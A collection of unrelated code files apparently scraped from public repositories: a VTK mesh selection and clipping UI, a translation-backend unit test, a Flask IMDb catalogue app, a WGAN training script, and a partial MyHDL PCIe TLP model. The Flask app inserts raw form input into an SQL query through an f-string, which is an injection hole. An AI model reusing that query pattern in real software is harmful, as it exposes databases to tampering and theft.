self.selection.GetTuple(id)[0]==0:\n self.current_id = id\n self.selection.SetTuple(id, np.array([2], dtype=np.int64))\n\n self.selection.Modified()\n self.render_window.Render()\n\n return None\n \n\n def _select(self):\n\n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n id = self.picker.GetPointId()\n if id >= 0:\n tup = self.selection.GetTuple(id)\n if tup[0] != 1:\n if tup[0] == 2: # doesn't have to, but it's nice\n self.current_id = 0\n 
self.selection.SetTuple(id, np.array([1], dtype=np.int64))\n self.selection.Modified()\n self.render_window.Render()\n\n return None\n \n\n def _deselect(self):\n\n self.selection.Fill(0)\n self.selection.Modified()\n self.render_window.Render()\n return None\n \n\n def _move(self):\n return None\n\n\n def left_button_press_event(self):\n\n if self.interactor.GetControlKey():\n return self._select()\n \n return super().left_button_press_event()\n\n\n def mouse_move_event(self):\n if self.interactor.GetControlKey():\n if self.mouse_status & MOUSE.LEFT:\n return self._select()\n else:\n return self._hover()\n return super().mouse_move_event()\n\n\n def key_press_event(self, key):\n\n if key == 'Escape':\n return self._deselect()\n elif key == 'space':\n return self._move()\n\n return super().key_press_event(key)\n\n\n def key_release_event(self, key):\n\n if key.startswith('Control'):\n if self.current_id is not None:\n if self.selection.GetTuple(self.current_id)[0] == 2:\n self.selection.SetTuple(self.current_id, np.array([0], dtype=np.int64))\n self.current_id = None\n self.selection.Modified()\n self.render_window.Render()\n\n return super().key_press_event(key)\n\n\nclass PolygonalSurfacePlanesClipper(Selector):\n\n '''????????????????????????????????\n counter-clockwise; port 0 - dark gray, remove; port 1 - light gray, keep\n '''\n\n def initialize(self, stl_path_or_polydata):\n\n if isinstance(stl_path_or_polydata, str):\n polyd = polydata_from_stl(stl_path_or_polydata)\n else:\n polyd = stl_path_or_polydata\n\n self.clipper = vtkClipPolyData()\n self.clipper.SetInputData(polyd)\n self.clipper.GenerateClippedOutputOn()\n self.planes_points = vtkPoints()\n self.planes_normals = vtkFloatArray()\n self.planes_normals.SetNumberOfComponents(3)\n\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(self.clipper.GetOutputPort(0))\n actor = vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(.4,.4,.4)\n self.renderer.AddActor(actor)\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(self.clipper.GetOutputPort(1))\n actor = vtkActor()\n actor.SetMapper(mapper)\n self.renderer.AddActor(actor)\n\n self.planes_polyd = vtkAppendPolyData()\n self.planes_polyd.AddInputData(vtkPolyData()) # so that the program would not complain\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(self.planes_polyd.GetOutputPort())\n actor = vtkActor()\n actor.SetMapper(mapper)\n self.renderer.AddActor(actor)\n\n self.cut()\n\n return super().initialize()\n \n\n def display_to_world(self, ij):\n coordinate = vtkCoordinate()\n coordinate.SetCoordinateSystemToDisplay()\n coordinate.SetValue(*ij, 0)\n xyz = coordinate.GetComputedWorldValue(self.renderer)\n\n return xyz\n\n\n\n def left_button_press_event(self):\n \n if self.mouse_status & MOUSE.CTRL:\n\n points = vtkPoints()\n points.InsertNextPoint(*self.display_to_world(self.interactor.GetEventPosition()))\n points.InsertNextPoint([float('nan')]*3)\n lines = vtkCellArray()\n lines.InsertNextCell(2,[0,1])\n polyd = vtkPolyData()\n polyd.SetPoints(points)\n polyd.SetLines(lines)\n mapper = vtkPolyDataMapper()\n mapper.SetInputData(polyd)\n\n self.line_actor = vtkActor()\n self.line_actor.SetMapper(mapper)\n self.line_actor.GetProperty().EdgeVisibilityOn()\n self.line_actor.GetProperty().SetColor(1,0,0)\n self.line_actor.GetProperty().SetLineWidth(2)\n \n return None\n\n # continue with a normal press\n return super().left_button_press_event()\n\n\n def mouse_move_event(self):\n\n if self.mouse_status & MOUSE.CTRL and self.mouse_status 
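The clipper above relies on vtkClipPolyData producing both halves of the cut when GenerateClippedOutputOn() is set: output port 0 carries one side and port 1 the other, which is why the class attaches a separately colored mapper to each port. A headless sketch of that two-output behavior, using a single vtkPlane in place of the accumulated vtkPlanes:

from vtkmodules.vtkCommonDataModel import vtkPlane
from vtkmodules.vtkFiltersCore import vtkClipPolyData
from vtkmodules.vtkFiltersSources import vtkSphereSource

sphere = vtkSphereSource()
plane = vtkPlane()
plane.SetOrigin(0, 0, 0)
plane.SetNormal(1, 0, 0)

clip = vtkClipPolyData()
clip.SetInputConnection(sphere.GetOutputPort())
clip.SetClipFunction(plane)
clip.GenerateClippedOutputOn()   # keep both sides of the cut
clip.Update()

# ports 0 and 1 hold the two halves
print(clip.GetOutput(0).GetNumberOfPoints(), clip.GetOutput(1).GetNumberOfPoints())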
& MOUSE.LEFT :\n if not self.mouse_status & MOUSE.MOVED:\n # add line_actor upon first movement\n self.renderer.AddActor(self.line_actor)\n\n # set moving point of the line\n points = self.line_actor.GetMapper().GetInput().GetPoints()\n points.SetPoint(1,*self.display_to_world(self.interactor.GetEventPosition())) \n points.Modified()\n \n self.render_window.Render()\n\n return None\n\n # continue with a normal press\n return super().mouse_move_event()\n\n\n def left_button_release_event(self):\n \n if self.mouse_status & MOUSE.CTRL and self.mouse_status & MOUSE.LEFT:\n if self.mouse_status & MOUSE.MOVED and self.line_actor:\n \n pts = self.line_actor.GetMapper().GetInput().GetPoints() \n anchor = np.array(pts.GetPoint(0))\n moving = np.array(pts.GetPoint(1))\n self.renderer.RemoveActor(self.line_actor)\n self.line_actor = None\n\n campos = np.array(self.renderer.GetActiveCamera().GetPosition())\n normal = np.cross(moving - anchor, campos - moving)\n normal = normal/np.sum(normal**2)**.5\n bd = self.clipper.GetInput().GetBounds()\n bd = np.array(bd)+np.array([-1,1,-1,1,-1,1])*10\n plane_polyd = polydata_from_plane([*normal, -np.array(normal).dot(anchor)], bd.tolist())\n\n # add this plane\n self.planes_points.InsertNextPoint(*anchor)\n self.planes_normals.InsertNextTuple(normal.tolist())\n self.cut()\n self.planes_polyd.AddInputData(plane_polyd)\n self.planes_polyd.Update()\n self.render_window.Render()\n return None\n\n \n return super().left_button_release_event()\n\n\n \n def cut(self):\n clip_func = vtkPlanes()\n clip_func.SetPoints(self.planes_points)\n clip_func.SetNormals(self.planes_normals)\n self.clipper.SetClipFunction(clip_func)\n self.clipper.Update()\n return None\n\n\n def reset(self):\n self.planes_points.Reset()\n self.planes_normals.Reset()\n self.planes_polyd.RemoveAllInputs()\n self.planes_polyd.AddInputData(vtkPolyData())\n self.planes_polyd.Update()\n self.cut()\n\n return None\n\n\n\n def key_press_event(self, key):\n\n if key == \"Escape\":\n self.reset()\n self.render_window.Render()\n return None\n\n return super().key_press_event(key)\n\n \n\n","repo_name":"kuangts/py-scripts","sub_path":"tools/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":34427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20566164301","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nimport polib\n\nfrom delia_mlg.backends import SanityBackend, ForceBackend, GlobalPOBackend, TranslationBackend\nfrom . 
import MockSourceBackend\n\n\nclass TestForceBackend(unittest.TestCase):\n def setUp(self):\n super(TestForceBackend, self).setUp()\n self.mock_force = MockSourceBackend()\n self.mock_global_po = MockSourceBackend()\n\n def get_backends(self):\n force_backend = ForceBackend(self.mock_force, SanityBackend())\n translation_backend = TranslationBackend(GlobalPOBackend(self.mock_global_po, SanityBackend()), SanityBackend(), force_backend)\n return force_backend, translation_backend\n\n def test(self):\n self.mock_force.add_translation('END', 'FIN')\n self.mock_global_po.add_translation('END', 'FOO')\n self.mock_force.add_translation('ALL', 'TOUS')\n self.mock_force.add_translation('FOO', 'BAR')\n self.mock_force.add_translation('FOO ', 'RABU')\n force_backend, translation_backend = self.get_backends()\n self.assertEqual('FIN', force_backend.get('END', 'en'))\n entry = polib.POEntry(msgid='END')\n self.assertTrue(translation_backend.translate_po_entry(entry, 'en'))\n self.assertEqual('FIN', entry.msgstr)\n self.assertEqual(' FIN ', force_backend.get(' END ', 'en'))\n entry = polib.POEntry(msgid=' END ')\n self.assertTrue(translation_backend.translate_po_entry(entry, 'en'))\n self.assertEqual(' FIN ', entry.msgstr)\n self.assertIsNone(force_backend.get('ALL', 'en'))\n self.assertEqual('TOUS', force_backend.get('ALL ', 'en'))\n self.assertEqual('TOUS ', force_backend.get('ALL ', 'en'))\n self.assertEqual('BAR', force_backend.get('FOO', 'en'))\n self.assertEqual(' BAR', force_backend.get(' FOO', 'en'))\n self.assertEqual('RABU', force_backend.get('FOO ', 'en'))\n self.assertEqual(' RABU', force_backend.get(' FOO ', 'en'))\n self.assertEqual('RABU ', force_backend.get('FOO ', 'en'))\n self.assertEqual(' RABU ', force_backend.get(' FOO ', 'en'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"azizlahmedi/iadev3.0","sub_path":"venv/lib/python3.11/site-packages/delia_mlg_tests/test_force_backend.py","file_name":"test_force_backend.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4611099203","text":"import sqlite3\nfrom sqlite3 import Error\nimport requests\nfrom flask import Flask, request, render_template, url_for, redirect\nimport json\nfrom flaskd.config import Config\n\napp = Flask(__name__)\ndb_file = r\"IMDb.db\"\n\nIMDbKey = Config.IMDbKey\naccess_token = Config.BitlyAT\nguid = Config.BitlyGuid\nheaders = {\"Authorization\": f\"Bearer {access_token}\"}\n\ndef create_connection():\n cnxn = None\n try:\n cnxn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n return cnxn\n\n@app.route('/create1', methods =[\"GET\", \"POST\"])\ndef create1():\n if request.method == 'POST':\n IMDbID = request.form['IMDbID']\n title = request.form['title']\n poster = request.form['poster']\n releaseDate = request.form['description']\n shorten_res = requests.post(\"https://api-ssl.bitly.com/v4/shorten\", json={\"group_guid\": guid, \"long_url\": poster}, headers=headers)\n link = shorten_res.json().get(\"link\")\n\n query = f\"INSERT INTO Media VALUES('{IMDbID}','{title}','{link}','{releaseDate}');\"\n try:\n with create_connection() as cnxn:\n cur = cnxn.cursor()\n cur.execute(query)\n cnxn.commit()\n except Error as e:\n print(e)\n\n return view()\n\n\n\n@app.route('/search')\ndef search():\n data = [{\"id\": \"\", \"resultType\": \"\", \"image\": \"/static/noPoster.jpeg\", \"title\": \"\", \"description\": \"\"}, \n {\"id\": \"\", \"resultType\": \"\", \"image\": 
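A caution on the flaskd record above: create1 interpolates raw form fields into the INSERT statement with an f-string, which breaks on any title containing a quote and is open to SQL injection. sqlite3 supports parameter binding, so the route could pass values separately; a sketch assuming the same four-column Media table:

import sqlite3

def insert_media(cnxn, imdb_id, title, link, release_date):
    # '?' placeholders let sqlite3 escape the values itself
    cnxn.execute(
        'INSERT INTO Media VALUES (?, ?, ?, ?);',
        (imdb_id, title, link, release_date),
    )
    cnxn.commit()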
\"/static/noPoster.jpeg\", \"title\": \"\", \"description\": \"\"}, \n {\"id\": \"\", \"resultType\": \"\", \"image\": \"/static/noPoster.jpeg\", \"title\": \"\", \"description\": \"\"}]\n return render_template('search.html', data=data)\n\n@app.route('/sendSearch', methods=[\"GET\", \"POST\"])\ndef sendSearch():\n APIurl = f'https://imdb-api.com/en/API/Search/{IMDbKey}/'\n if request.method == 'POST':\n search = request.form.get('q')\n search = search.replace(' ', '%20')\n query = APIurl + search\n response = requests.get(query)\n response = json.loads(response.text)\n data = []\n reslen = len(response['results'])\n if reslen > 10:\n reslen = 10\n for i in range(reslen):\n data.append(response['results'][i])\n m =1\n for i in data:\n i['choice'] = f'choice{m}'\n m += 1\n return render_template('search.html', data=data)\n \n\n@app.route('/')\ndef view():\n rows = []\n query = \"SELECT * FROM Media ORDER BY Title\"\n with create_connection() as cnxn:\n cur = cnxn.cursor()\n cur.execute(query)\n row = cur.fetchone()\n\n while row:\n rows.append(row)\n row = cur.fetchone()\n return render_template('index.html', data=rows)\n \n\ndef main():\n return(app)\n","repo_name":"dharmik529/FlaskIMDb","sub_path":"flaskd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36486598435","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom utilities import *\nimport tensorflow as tf\nkeras = tf.keras\n\n\n# N_SAMPLES = 10240\n# N_EPOCHS = 50\nN_CRITIC = 5\n# BATCH_SIZE = 64\n# CODE_LENGTH = 256\n\n\ngenerator = generator\noptimizer_gen = keras.optimizers.Adam(learning_rate=5/10_000, beta_1=1/2, beta_2=9/10)\ntrain_loss_gen = keras.metrics.Mean(name='train_loss')\n\n\ndiscriminator = discriminator\noptimizer_dis = keras.optimizers.Adam(learning_rate=5/10_000, beta_1=1/2, beta_2=9/10)\ntrain_loss_dis = keras.metrics.Mean(name='train_loss')\n\n\ndef run_generator(z, training=False):\n z_g = tf.reshape(z, [-1, 1, 1, CODE_LENGTH])\n return generator(z_g, training=training)\n\n\ndef run_discriminator(x, training=False):\n x_d = tf.image.resize(x, [64, 64])\n return discriminator(x_d, training=training)\n\n\ndef run_model(x_i, z_n, training=False):\n x_g = run_generator(z_n, training=training)\n z_d1 = run_discriminator(x_i, training=training)\n z_d2 = run_discriminator(x_g, training=training)\n # print(z_d2.shape)\n # print(z_d1.shape)\n # print()\n loss_discriminator = tf.reduce_mean(z_d2 - z_d1)\n loss_generator = tf.reduce_mean(-z_d2)\n return loss_discriminator, loss_generator\n\n\n@tf.function\ndef learn_discriminator(x_i):\n # z_n = tf.random.uniform([BATCH_SIZE, CODE_LENGTH], -1., 1.)\n z_n = tf.random.uniform([x_i.shape[0], CODE_LENGTH], -1., 1.)\n with tf.GradientTape() as tape:\n loss_discriminator, _ = run_model(x_i, z_n, training=True)\n grad_discriminator = tape.gradient(loss_discriminator, discriminator.trainable_variables)\n optimizer_dis.apply_gradients(zip(grad_discriminator, discriminator.trainable_variables))\n for v in discriminator.trainable_variables:\n v.assign(tf.clip_by_value(v, -0.01, 0.01))\n train_loss_dis(loss_discriminator)\n\n\n@tf.function\ndef learn_generator():\n z_n = tf.random.uniform([BATCH_SIZE, CODE_LENGTH], -1., 1.)\n x_g = tf.zeros([BATCH_SIZE, width, height, 1]) # don't need discriminator values of true distribution\n with tf.GradientTape() as tape:\n _, loss_generator = run_model(x_g, z_n, 
training=True)\n grad_generator = tape.gradient(loss_generator, generator.trainable_variables)\n optimizer_gen.apply_gradients(zip(grad_generator, generator.trainable_variables))\n train_loss_gen(loss_generator)\n\n\n(X_train, _), (_, _) = keras.datasets.fashion_mnist.load_data()\nX_train = X_train.astype(np.float32)[0: N_SAMPLES] / 255.\nwidth = X_train.shape[1]\nheight = X_train.shape[2]\nX_train_g = tf.data.Dataset.from_tensor_slices(\n np.expand_dims(X_train, axis=3)\n).shuffle(1000).batch(BATCH_SIZE)\n# ).shuffle(1000).batch(N_CRITIC * BATCH_SIZE)\n\n\ndef train():\n for e in range(N_EPOCHS):\n for x_i in X_train_g:\n # for i in range(N_CRITIC):\n # learn_discriminator(x_i[i * BATCH_SIZE: (i+1) * BATCH_SIZE])\n learn_discriminator(x_i)\n learn_generator()\n print('Epoch %d | Discriminator Loss: %.3f | Generator Loss: %.3f'\n % (e, train_loss_dis.result(), train_loss_gen.result()))\n train_loss_dis.reset_states()\n train_loss_gen.reset_states()\n\n\ntrain()\n\n\n# SHOW SOME RESULTS\nZ = np.random.uniform(low=-1., high=1., size=[50, CODE_LENGTH]).astype(np.float32)\nY_s = run_generator(Z, training=False)\nY_s = np.squeeze((Y_s + 1.) * 1/2 * 255.).astype(np.uint8)\nsns.set()\nfig, ax = plt.subplots(nrows=5, ncols=10, figsize=[22, 8])\nfor i in range(5):\n for j in range(10):\n ax[i, j].imshow(Y_s[i + j], cmap='gray')\n ax[i, j].set_xticks([])\n ax[i, j].set_yticks([])\nplt.show()\nplt.clf()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Talon1989/ml_2023","sub_path":"gan/01_WGAN.py","file_name":"01_WGAN.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5461921830","text":"import inspect\nimport math\nimport mmap\nimport struct\nfrom myhdl import *\n\n# TLP formats\nFMT_3DW = 0x0\nFMT_4DW = 0x1\nFMT_3DW_DATA = 0x2\nFMT_4DW_DATA = 0x3\nFMT_TLP_PREFIX = 0x4\n\nTLP_MEM_READ = (FMT_3DW, 0x00)\nTLP_MEM_READ_64 = (FMT_4DW, 0x00)\nTLP_MEM_READ_LOCKED = (FMT_3DW, 0x01)\nTLP_MEM_READ_LOCKED_64 = (FMT_4DW, 0x01)\nTLP_MEM_WRITE = (FMT_3DW_DATA, 0x00)\nTLP_MEM_WRITE_64 = (FMT_4DW_DATA, 0x00)\nTLP_IO_READ = (FMT_3DW, 0x02)\nTLP_IO_WRITE = (FMT_3DW_DATA, 0x02)\nTLP_CFG_READ_0 = (FMT_3DW, 0x04)\nTLP_CFG_WRITE_0 = (FMT_3DW_DATA, 0x04)\nTLP_CFG_READ_1 = (FMT_3DW, 0x05)\nTLP_CFG_WRITE_1 = (FMT_3DW_DATA, 0x05)\nTLP_MSG_TO_RC = (FMT_4DW, 0x10)\nTLP_MSG_ADDR = (FMT_4DW, 0x11)\nTLP_MSG_ID = (FMT_4DW, 0x12)\nTLP_MSG_BCAST = (FMT_4DW, 0x13)\nTLP_MSG_LOCAL = (FMT_4DW, 0x14)\nTLP_MSG_GATHER = (FMT_4DW, 0x15)\nTLP_MSG_DATA_TO_RC = (FMT_4DW_DATA, 0x10)\nTLP_MSG_DATA_ADDR = (FMT_4DW_DATA, 0x11)\nTLP_MSG_DATA_ID = (FMT_4DW_DATA, 0x12)\nTLP_MSG_DATA_BCAST = (FMT_4DW_DATA, 0x13)\nTLP_MSG_DATA_LOCAL = (FMT_4DW_DATA, 0x14)\nTLP_MSG_DATA_GATHER = (FMT_4DW_DATA, 0x15)\nTLP_CPL = (FMT_3DW, 0x0A)\nTLP_CPL_DATA = (FMT_3DW_DATA, 0x0A)\nTLP_CPL_LOCKED = (FMT_3DW, 0x0B)\nTLP_CPL_LOCKED_DATA = (FMT_3DW_DATA, 0x0B)\nTLP_FETCH_ADD = (FMT_3DW_DATA, 0x0C)\nTLP_FETCH_ADD_64 = (FMT_4DW_DATA, 0x0C)\nTLP_SWAP = (FMT_3DW_DATA, 0x0D)\nTLP_SWAP_64 = (FMT_4DW_DATA, 0x0D)\nTLP_CAS = (FMT_3DW_DATA, 
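The (fmt, type) constants above follow the PCIe TLP header encoding: in the 3-bit fmt field, bit 0 selects a 4-DW header (64-bit address) over a 3-DW one, bit 1 marks a TLP that carries a data payload, and 0b100 introduces a TLP prefix. A tiny decoder over those bits:

FMT_4DW_BIT = 0x1    # header is 4 dwords (64-bit address)
FMT_DATA_BIT = 0x2   # TLP carries a data payload

def describe_fmt(fmt):
    size = '4DW' if fmt & FMT_4DW_BIT else '3DW'
    data = 'with data' if fmt & FMT_DATA_BIT else 'no data'
    return '%s header, %s' % (size, data)

for name, fmt in [('MemRd32', 0x0), ('MemRd64', 0x1),
                  ('MemWr32', 0x2), ('MemWr64', 0x3)]:
    print(name, '->', describe_fmt(fmt))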
0x0E)\nTLP_CAS_64 = (FMT_4DW_DATA, 0x0E)\nTLP_PREFIX_MRIOV = (FMT_TLP_PREFIX, 0x00)\nTLP_PREFIX_VENDOR_L0 = (FMT_TLP_PREFIX, 0x0E)\nTLP_PREFIX_VENDOR_L1 = (FMT_TLP_PREFIX, 0x0F)\nTLP_PREFIX_EXT_TPH = (FMT_TLP_PREFIX, 0x10)\nTLP_PREFIX_VENDOR_E0 = (FMT_TLP_PREFIX, 0x1E)\nTLP_PREFIX_VENDOR_E1 = (FMT_TLP_PREFIX, 0x1F)\n\n# Message types\nMSG_UNLOCK = 0x00\nMSG_INVALIDATE_REQ = 0x01\nMSG_INVALIDATE_CPL = 0x02\nMSG_PAGE_REQ = 0x04\nMSG_PRG_RESP = 0x05\nMSG_LTR = 0x10\nMSG_OBFF = 0x12\nMSG_PM_AS_NAK = 0x14\nMSG_PM_PME = 0x18\nMSG_PME_TO = 0x19\nMSG_PME_TO_ACK = 0x1A\nMSG_ASSERT_INTA = 0x20\nMSG_ASSERT_INTB = 0x21\nMSG_ASSERT_INTC = 0x22\nMSG_ASSERT_INTD = 0x23\nMSG_DEASSERT_INTA = 0x24\nMSG_DEASSERT_INTB = 0x25\nMSG_DEASSERT_INTC = 0x26\nMSG_DEASSERT_INTD = 0x27\nMSG_ERR_COR = 0x30\nMSG_ERR_NONFATAL = 0x31\nMSG_ERR_FATAL = 0x32\nMSG_SET_SPL = 0x50\nMSG_VENDOR_0 = 0x7e\nMSG_VENDOR_1 = 0x7f\n\nAT_DEFAULT = 0x0\nAT_TRANSLATE_REQ = 0x1\nAT_TRANSLATED = 0x2\n\nCPL_STATUS_SC = 0x0 # successful completion\nCPL_STATUS_UR = 0x1 # unsupported request\nCPL_STATUS_CRS = 0x2 # configuration request retry status\nCPL_STATUS_CA = 0x4 # completer abort\n\n# PCIe capabilities\nMSI_CAP_ID = 0x05\nMSI_CAP_LEN = 6\nMSIX_CAP_ID = 0x11\nMSIX_CAP_LEN = 3\n\nPM_CAP_ID = 0x01\nPM_CAP_LEN = 2\n\nPCIE_CAP_ID = 0x10\nPCIE_CAP_LEN = 15\n\nSEC_PCIE_EXT_CAP_ID = 0x0019\nSEC_PCIE_EXT_CAP_LEN = 3\n\nPCIE_GEN_RATE = {\n 1: 2.5*8/10,\n 2: 5*8/10,\n 3: 8*128/130,\n 4: 16*128/130,\n 5: 32*128/130,\n}\n\n\n# debugging\ntrace_routing = False\n\n\ndef align(val, mask):\n if val & mask:\n return val + mask + 1 - (val & mask)\n else:\n return val\n\n\ndef byte_mask_update(old, mask, new, bitmask=-1):\n new = (new & bitmask) | (old & ~bitmask)\n m1 = 1\n m2 = 0xff\n while mask >= m1:\n if mask & m1:\n old = (old & ~m2) | (new & m2)\n m1 <<= 1\n m2 <<= 8\n return old\n\n\ndef highlight(s):\n return \"\\033[32m%s\\033[0m\" % s\n\n\nclass PcieId(object):\n def __init__(self, bus=0, device=0, function=0):\n self.bus = 0\n self.device = 0\n self.function = 0\n if isinstance(bus, PcieId):\n self.bus = bus.bus\n self.device = bus.device\n self.function = bus.function\n elif isinstance(bus, tuple):\n self.bus, self.device, self.function = bus\n else:\n self.bus = bus\n self.device = device\n self.function = function\n\n @classmethod\n def from_int(cls, val):\n return cls((val >> 8) & 0xff, (val >> 3) & 0x1f, val & 0x7)\n\n def __eq__(self, other):\n if isinstance(other, PcieId):\n return self.bus == other.bus and self.device == other.device and self.function == other.function\n return False\n\n def __int__(self):\n return ((self.bus & 0xff) << 8) | ((self.device & 0x1f) << 3) | (self.function & 0x7)\n\n def __str__(self):\n return \"%02x:%02x.%x\" % (self.bus, self.device, self.function)\n\n def __repr__(self):\n return \"PcieId(%d, %d, %d)\" % (self.bus, self.device, self.function)\n\n\nclass PcieCap(object):\n def __init__(self, cap_id, cap_ver=None, length=None, read=None, write=None, offset=None, next_cap=None):\n self.cap_id = cap_id\n self.cap_ver = cap_ver\n self.length = length\n self.read = read\n self.write = write\n self.offset = offset\n self.next_cap = next_cap\n\n def read_register(self, reg):\n val = self.read(reg)\n if reg == 0:\n val = (val & 0xffff0000) | ((self.next_cap & 0xff) << 8) | (self.cap_id & 0xff)\n return val\n\n def write_register(self, reg, data, mask):\n self.write(reg, data, mask)\n\n def __repr__(self):\n return \"PcieCap(cap_id={:#x}, cap_ver={}, length={}, read={}, write={}, offset={}, 
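byte_mask_update above treats each mask bit as a byte lane select: bytes of new whose mask bit is set replace the corresponding bytes of old, and the optional bitmask limits which bits of new are considered at all. A small worked example (values arbitrary), assuming the function defined above is in scope:

old = 0x11223344
new = 0xAABBCCDD
# mask 0b0101 selects bytes 0 and 2 from new, keeps bytes 1 and 3 from old
assert byte_mask_update(old, 0b0101, new) == 0x11BB33DD
# bitmask 0x0f admits only the low nibble of new before the byte merge
assert byte_mask_update(old, 0b0001, new, bitmask=0x0f) == 0x1122334D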
next_cap={})\".format(self.cap_id, repr(self.cap_ver), repr(self.length), repr(self.read), repr(self.write), repr(self.offset), repr(self.next_cap))\n\n\nclass PcieExtCap(PcieCap):\n def read_register(self, reg):\n if reg == 0:\n return ((self.next_cap & 0xfff) << 20) | ((self.cap_ver & 0xf) << 16) | (self.cap_id & 0xffff)\n return self.read(reg)\n\n\nclass PcieCapList(object):\n def __init__(self):\n self.cap_type = PcieCap\n self.list = []\n self.start = 0x10\n self.end = 0x3f\n\n def find_by_id(self, cap_id):\n for cap in self.list:\n if cap.cap_id == cap_id:\n return cap\n return None\n\n def find_by_reg(self, reg):\n for cap in self.list:\n if cap.offset <= reg < cap.offset+cap.length:\n return cap\n return None\n\n def read_register(self, reg):\n cap = self.find_by_reg(reg)\n if cap:\n return cap.read_register(reg-cap.offset)\n return 0\n\n def write_register(self, reg, data, mask):\n cap = self.find_by_reg(reg)\n if cap:\n cap.write_register(reg-cap.offset, data, mask)\n\n def register(self, cap_id, cap_ver=None, length=None, read=None, write=None, offset=None):\n if isinstance(cap_id, self.cap_type):\n new_cap = cap_id\n else:\n new_cap = self.find_by_id(cap_id)\n\n if new_cap:\n # re-registering cap\n\n # remove from list\n self.list.remove(new_cap)\n\n # update parameters\n if cap_ver is not None:\n new_cap.cap_ver = cap_ver\n if length:\n new_cap.length = length\n if read:\n new_cap.read = read\n if write:\n new_cap.write = write\n if offset:\n new_cap.offset = offset\n\n if not new_cap:\n new_cap = self.cap_type(cap_id, cap_ver, length, read, write, offset)\n\n if not new_cap.length or not new_cap.read or not new_cap.write:\n raise Exception(\"Missing required parameter\")\n\n bump_list = []\n\n if new_cap.offset:\n for cap in self.list:\n if cap.offset <= new_cap.offset+new_cap.length-1 and new_cap.offset <= cap.offset+cap.length-1:\n bump_list.append(cap)\n for cap in bump_list:\n self.list.remove(cap)\n else:\n new_cap.offset = self.start\n for cap in self.list:\n if cap.offset < new_cap.offset+new_cap.length-1 and new_cap.offset <= cap.offset+cap.length-1:\n new_cap.offset = cap.offset+cap.length\n\n self.list.append(new_cap)\n\n # sort list by offset\n self.list.sort(key=lambda x: x.offset)\n\n # update list next cap pointers\n for k in range(1, len(self.list)):\n self.list[k-1].next_cap = self.list[k].offset*4\n self.list[k].next_cap = 0\n\n # re-insert bumped caps\n for cap in bump_list:\n cap.offset = None\n self.register(cap)\n\n\nclass PcieExtCapList(PcieCapList):\n def __init__(self):\n super(PcieExtCapList, self).__init__()\n self.cap_type = PcieExtCap\n self.start = 0x40\n self.end = 0x3ff\n\n\nclass TLP(object):\n def __init__(self, tlp=None):\n self.fmt = 0\n self.type = 0\n self.tc = 0\n self.th = 0\n self.td = 0\n self.ep = 0\n self.attr = 0\n self.at = 0\n self.length = 0\n self.completer_id = PcieId(0, 0, 0)\n self.status = 0\n self.bcm = 0\n self.byte_count = 0\n self.requester_id = PcieId(0, 0, 0)\n self.dest_id = PcieId(0, 0, 0)\n self.tag = 0\n self.first_be = 0\n self.last_be = 0\n self.lower_address = 0\n self.address = 0\n self.register_number = 0\n self.data = []\n\n if isinstance(tlp, TLP):\n self.fmt = tlp.fmt\n self.type = tlp.type\n self.tc = tlp.tc\n self.td = tlp.td\n self.ep = tlp.ep\n self.attr = tlp.attr\n self.at = tlp.at\n self.length = tlp.length\n self.completer_id = tlp.completer_id\n self.status = tlp.status\n self.bcm = tlp.bcm\n self.byte_count = tlp.byte_count\n self.requester_id = tlp.requester_id\n self.dest_id = tlp.dest_id\n 
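PcieCapList.register above allocates offsets starting at 0x10 (in DWORDs), bumps overlapping entries, and rewires each entry's next_cap to the byte offset (offset*4) of its successor. A usage sketch with two dummy capabilities, assuming the classes above are in scope:

caps = PcieCapList()
caps.register(0x01, length=2, read=lambda reg: 0, write=lambda reg, d, m: None)
caps.register(0x05, length=6, read=lambda reg: 0, write=lambda reg, d, m: None)
# the second capability lands right after the first; next_cap chains byte offsets
assert [c.offset for c in caps.list] == [0x10, 0x12]
assert caps.list[0].next_cap == 0x12 * 4
assert caps.list[1].next_cap == 0  # end of chain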
